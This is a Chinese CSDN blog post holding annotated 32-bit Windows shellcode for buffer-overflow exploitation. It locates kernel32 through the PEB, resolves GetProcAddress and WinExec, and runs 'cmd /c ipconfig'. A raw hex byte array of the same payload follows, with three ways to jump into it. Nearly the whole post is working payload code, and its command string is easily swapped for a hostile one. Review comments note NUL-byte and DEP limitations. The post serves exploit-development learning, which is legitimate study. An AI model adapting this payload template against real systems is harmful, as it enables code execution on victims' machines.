缓冲区溢出shellcode
/*
 * fun() — a position-independent 32-bit Windows payload written as MSVC
 * inline assembly.  It locates the kernel32.dll base through the PEB loader
 * list, scans kernel32's export name table for "GetProcA..." to find
 * GetProcAddress, resolves WinExec with it and runs "cmd /c ipconfig".
 * The hex array `shellcode[]` in the second listing on this page is the
 * machine-code encoding of this __asm block; it ends at the final `call ebx`
 * (FF D3), so no `leave`/`ret` is part of the payload.
 *
 * NOTE(review): x86-32 only (fs:[0x30], PE32 header offsets).  The module
 * walk assumes the classic InLoadOrderModuleList order exe -> ntdll ->
 * kernel32; confirm on the Windows version you target.  ebp is overwritten
 * with the kernel32 base and never restored, so the compiler-generated
 * epilogue of fun() cannot unwind correctly once WinExec returns — the
 * payload is not designed to return to its caller.
 */
void fun()
{
    __asm {
        // ---- locate kernel32.dll via the PEB ------------------------------
        mov eax, dword ptr fs:[0x30];      // eax = PEB (TEB+0x30)
        mov eax, dword ptr [eax+0xC];      // eax = PEB->Ldr
        mov eax, dword ptr [eax+0xC];      // eax = Ldr->InLoadOrderModuleList.Flink (1st entry: the exe itself)
        mov eax, dword ptr [eax];          // 2nd entry (ntdll.dll, assumed)
        mov eax, dword ptr [eax];          // 3rd entry (kernel32.dll, assumed)
        mov eax, dword ptr [eax+0x18];     // LDR_DATA_TABLE_ENTRY.DllBase
        mov ebp,eax                        // ebp = kernel32.dll base; reused below as hModule

        // ---- find the export directory -------------------------------------
        mov eax,dword ptr ss:[ebp+3CH]         // eax = e_lfanew (offset of the NT headers)
        mov edx,dword ptr ds:[eax+ebp+78H]     // edx = DataDirectory[0].VirtualAddress (export directory RVA, PE32 layout)
        add edx,ebp                            // edx = IMAGE_EXPORT_DIRECTORY (VA)
        mov ecx,dword ptr ds:[edx+18H]         // ecx = NumberOfNames (offset 0x18)
                                               // NOTE(review): the original comment called this NumberOfFunctions,
                                               // which lives at 0x14; the loop below indexes the *name* table, so
                                               // NumberOfNames is the correct bound.
        mov ebx,dword ptr ds:[edx+20H]         // ebx = AddressOfNames (RVA)
        add ebx,ebp                            // ebx = AddressOfNames (VA)

        // ---- scan the export names from the end for "GetProcA" -------------
        // Only the first 8 bytes of each name are compared, and there is no
        // termination check: if nothing matches, `dec ecx` wraps and the scan
        // runs past the table.  NOTE(review): any other export whose name also
        // begins with "GetProcA" would be matched first when scanning downward
        // — verify against the kernel32 build you target.
    start:
        dec ecx                                // next index (runs NumberOfNames-1 .. 0)
        mov esi,dword ptr ds:[ebx+ecx*4]       // esi = AddressOfNames[ecx] (RVA of the name string)
        add esi,ebp                            // esi = name string (VA)
        mov eax,0x50746547                     // "GetP" as a little-endian dword
        cmp dword ptr ds:[esi],eax             // compare bytes 0..3
        jnz start
        mov eax,0x41636F72                     // "rocA"
        cmp dword ptr ds:[esi+4],eax           // compare bytes 4..7 — "GetProcA" is taken as sufficient to identify GetProcAddress
        jnz start

        // ---- name index -> ordinal -> function address ---------------------
        mov ebx,dword ptr ds:[edx+24H]         // ebx = AddressOfNameOrdinals (RVA)
        add ebx,ebp
        mov cx,word ptr ds:[ebx+ecx*2]         // cx = ordinal; only the low 16 bits of ecx are replaced, the upper
                                               // 16 bits still hold those of the name index (zero while index < 0x10000)
        mov ebx,dword ptr ds:[edx+1CH]         // ebx = AddressOfFunctions (RVA)
        add ebx,ebp
        mov eax,dword ptr ds:[ebx+ecx*4]       // eax = AddressOfFunctions[ordinal] (RVA)
        add eax,ebp                            // eax = GetProcAddress (VA)
        mov ebx,eax                            // keep GetProcAddress in ebx so later shellcode can call it again

        // ---- GetProcAddress(kernel32, "WinExec") ---------------------------
        push 0                                 // extra zero dword (string is already terminated by the 0x00 in "xec\0")
        push 0x636578                          // "xec\0"
        push 0x456E6957                        // "WinE"  -> esp now points at "WinExec"
        push esp                               // lpProcName
        push ebp                               // hModule = kernel32 base
        call ebx                               // eax = WinExec (stdcall: callee pops both arguments)
        mov ebx,eax                            // ebx = WinExec (the original comment said ecx; the code uses ebx)

        // ---- WinExec("cmd /c ipconfig", SW_SHOWNORMAL) ---------------------
        push 0x00676966                        // "fig\0"
        push 0x6E6F6370                        // "pcon"
        push 0x6920632F                        // "/c i"
        push 0x20646d63                        // "cmd "  -> esp now points at "cmd /c ipconfig"
        lea eax,[esp];                         // eax = address of the command string
        push 1                                 // uCmdShow = 1 (SW_SHOWNORMAL)
        push eax                               // lpCmdLine = "cmd /c ipconfig"
        call ebx                               // WinExec(lpCmdLine, uCmdShow)
        // leave                               // left commented out in the original ("jump back to the original entry point")
        // No clean exit follows: when WinExec returns, execution falls off the
        // end of the payload.  A usable payload would call ExitThread /
        // ExitProcess here, or restore ebp/esp and return.
    }
}

/* Driver for the first listing.  The second listing on this page defines its
 * own main(); the two listings are alternatives and cannot be built into one
 * translation unit. */
int main(int argc, char* argv[])
{
    fun();
}
/*
 * Second listing: executes the raw byte form of the payload from fun().
 * The array is the machine-code encoding of fun()'s __asm block and ends at
 * the final `call ebx` (FF D3) — there is no ret/leave, so control does not
 * come back to main() cleanly once WinExec returns.
 *
 * NOTE(review): the bytes contain several 0x00 (the fs:[0x30] displacement,
 * `push 0`, and the "WinExec"/"ipconfig" terminators), so this payload does
 * not survive a NUL-terminated string copy; an actual overflow delivery would
 * need a NUL-free encoding.  NOTE(review): shellcode[] lives in main()'s
 * stack frame; in a process with DEP/NX enabled, jumping into it faults
 * unless the memory is made executable first (e.g. VirtualAlloc/VirtualProtect
 * with PAGE_EXECUTE_READWRITE) — confirm on the test machine.
 */
int main(int argc, char* argv[])
{
unsigned char shellcode[]={
0x64,0xA1,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,0x00,0x8B,0x40,
0x18,0x8B,0xE8,0x36,0x8B,0x45,0x3C,0x3E,0x8B,0x54,0x28,0x78,0x03,0xD5,0x3E,0x8B,0x4A,0x18,
0x3E,0x8B,0x5A,0x20,0x03,0xDD,0x49,0x3E,0x8B,0x34,0x8B,0x03,0xF5,0xB8,0x47,0x65,0x74,0x50,
0x3E,0x39,0x06,0x75,0xEF,0xB8,0x72,0x6F,0x63,0x41,0x3E,0x39,0x46,0x04,0x75,0xE4,0x3E,0x8B,
0x5A,0x24,0x03,0xDD,0x66,0x3E,0x8B,0x0C,0x4B,0x3E,0x8B,0x5A,0x1C,0x03,0xDD,0x3E,0x8B,0x04,
0x8B,0x03,0xC5,0x8B,0xD8,0x6A,0x00,0x68,0x78,0x65,0x63,0x00,0x68,0x57,0x69,0x6E,0x45,0x54,
0x55,0xFF,0xD3,0x8B,0xD8,0x68,0x66,0x69,0x67,0x00,0x68,0x70,0x63,0x6F,0x6E,0x68,0x2F,0x63,
0x20,0x69,0x68,0x63,0x6D,0x64,0x20,0x8D,0x04,0x24,0x6A,0x01,0x50,0xFF,0xD3};
// Three ways to transfer control to the shellcode.  They are alternatives —
// keep exactly one.  As written they run in sequence, and none is expected to
// return (the payload has no ret), so the later ones are effectively dead code.
// Method 1: cast the array to a function pointer and call it (pushes a return
// address the payload never uses).
((void (*)())&shellcode)(); // run the shellcode
// Method 2: load the array address and jmp to it (no return address pushed).
__asm
{
lea eax,shellcode;
jmp eax;
}
// Method 3: push the array address and `ret` into it.
__asm
{
lea eax, shellcode
push eax
ret
}
}
————————————————
版权声明:本文为CSDN博主「maotoula」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/maotoula/article/details/18502679
